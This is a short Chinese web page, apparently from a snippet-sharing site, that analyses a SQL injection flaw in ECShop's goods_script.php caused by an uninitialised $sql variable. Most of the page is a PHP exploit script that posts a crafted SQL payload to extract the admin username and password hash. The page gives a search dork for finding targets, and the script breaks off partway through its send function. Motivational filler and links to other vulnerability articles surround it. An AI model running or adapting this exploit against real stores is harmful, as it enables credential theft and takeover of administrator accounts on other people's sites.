ECShop 注射漏洞分析

请好好珍惜,因为今天是你往后日子里最年轻的一天。有了梦想,你就会有动力,有了动力,你才会有成功的希望。对待健康,偏见比无知更可怕!
影响2.5.x和2.6.x,其他版本未测试
goods_script.php
44行:

复制代码
代码如下:

if (empty($_GET['type']))
{
...
}
elseif ($_GET['type'] == 'collection')
{
...
}
$sql .= " LIMIT " . (!empty($_GET['goods_num']) ? intval($_GET['goods_num']) : 10);
$res = $db->query($sql);

$sql没有初始化,很明显的一个漏洞:)
EXP:

复制代码
代码如下:

#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit
by puret_t
mail: puretot at gmail dot com
team: http://bbs.wolvez.org
dork: "Powered by ECShop"
+---------------------------------------------------------------------------+
');
/**
* works with register_globals = On
*/
if ($argc < 3) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to ecshop
Example:
php '.$argv[0].' localhost /ecshop/
+---------------------------------------------------------------------------+
');
exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$resp = send();
preg_match('#href="([\S]+):([a-z0-9]{32})"#', $resp, $hash);
if ($hash)
exit("Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n");
else
exit("Exploit Failed!\n");
function send()
{
global $host, $path;
$cmd = 'sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x'.bin2hex('all').' LIMIT 1#';
$data = "POST ".$path."goods_script.php?type=".time()." HTTP/1.1\r\n";
$data .= "Accept: */*\r\n";
$data .= "Accept-Language: zh-cn\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$data .= "Host: $host\r\n";
$data .= "Content-Length: ".strlen($cmd)."\r\n";
$data .= "Connection: Close\r\n\r\n";
$data .= $cmd;

以上就是ECShop 注射漏洞分析。一个人,无论经历怎样的风雨,有过怎样的生活,奋进过,就是成功;不悔过,就是值得。人的价值不在于身价,而在于为他人带去正能量的价值;生命的意义不在于拥有的财富,而在于活着的真实。更多关于ECShop 注射漏洞分析请关注haodaima.com其它相关文章!

您可能有感兴趣的文章
ECShop网店系统<=V2.6.2 后台拿webshell

管家婆软件官方网存在SQL注射及弱口令的漏洞分析

傲游浏览器官网存在SQL注射漏洞分析

2019最新RDP远程桌面漏洞官方补丁(针对win2003、win2008)

宝塔面板 phpmyadmin 未授权访问漏洞 BUG ip:888/pma的问题分析